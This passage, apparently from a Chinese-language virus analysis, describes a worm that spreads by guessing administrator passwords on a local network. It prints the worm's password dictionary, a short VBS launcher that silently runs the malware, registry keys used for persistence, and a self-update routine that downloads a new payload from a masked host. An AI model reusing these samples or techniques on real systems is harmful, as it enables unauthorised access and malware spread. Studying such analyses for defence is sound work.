(9) 局域网弱密码猜解传播
以administrator为用户名,对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中,以hackshen.exe
病毒猜解的密码字典如下:
woaini
baby
asdf
NULL
angel
asdfgh
1314520
5201314
caonima
88888
bbbbbb
12345678
memory
abc123
qwerty
123456
password
enter
hack
xpuser
money
yeah
time
game
user
home
alex
guest
admin
test
administrator
movie
root
love
(10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键
释放一个hackchen.vbs到%systemroot%\Tasks
hackchen.vbs内容:
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\csrss.exe",0
并且注册HKLM\SOFTWARE\Microsoft\Active Setup\Installed
Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向%systemroot%\Tasks\hackchen.vbs
(11)
病毒自动更新功能。在系统目录下释放meupdate.ini文件,并且和http://www.*******.cn/22.txt做比较,如果不同则下载http://www.*******.cn/server.exe(最新版病毒程序)到c:\_default.pif,并且每600ms执行一次